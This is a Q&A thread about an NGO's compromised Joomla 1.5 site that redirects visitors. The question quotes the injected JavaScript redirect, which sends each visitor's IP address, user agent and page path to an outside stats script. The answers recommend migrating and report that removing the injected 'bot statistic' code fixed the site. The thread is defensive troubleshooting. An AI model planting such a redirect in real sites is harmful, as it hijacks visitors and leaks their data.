NGO Joomla! site: Infected with malware? JavaScript injection?

Question

Please help us with this NGO site running Joomla! 1.5.

They can't pay a security professional right now, so maybe you guys can help isolate the problem?

If you go to http://casatrespatios.org you get redirected to some openDNS page http://www.website-unavailable.com/

There is a javascript tag at the bottom of the page:

<script type="text/javascript">location.replace("http://guidetest.a.id.opendns.com/?url=www%2Ealabora%2Eorg%2Fcss%2Fstat%2Ephp%3Fip%3D186%2E115%2E71%2E1%26useragent%3Dmozilla%252F5%2E0%2B%2528x11%253B%2Blinux%2Bi686%2B%2528x86%5F64%2529%2529%2Bapplewebkit%252F537%2E36%2B%2528khtml%252C%2Blike%2Bgecko%2529%2Bchrome%252F28%2E0%2E1500%2E52%2Bsafari%252F537%2E36%26domainname%3Dcasatrespatios%2Eorg%26fullpath%3D%252F&servfail&nref");</script>

which seems to be the culprit. This code is not in the correspondent php template file. I have no idea how this code gets injected into the page. Does anyone have an idea?

Answer 1

Support for Joomla 1.5 LTS ended in Dec 2012. This usually means that no more security patches (or any other maintenance patches) will be released.

The "solution" is to migrate content from a known good backup to a supported Joomla version, or some other current Content Management System.

Even if someone here were able to figure out a fix, you would have to migrate anyway, because Joomla 1.5 is out of support - so you might as well do it now.

Answer 2

My investigations brought me to this link: http://forum.joomla.org/viewtopic.php?f=432&t=341064&view=next

It seems the problem is related to that information, and removing the code at the bottom labelled as ""This code use for global bot statistic" seems to have fixed the problem.

Weird is, that file changes for that file are from 21.July 2012...So it must have been infected a long time ago, and nobody ever noticed until the site it was redirecting to no longer responded or something like that...

In any case I will suggest to the NGO to secure funding to upgrade the site, in order to be up-to-date concerning security. Thanks to all who chimed in.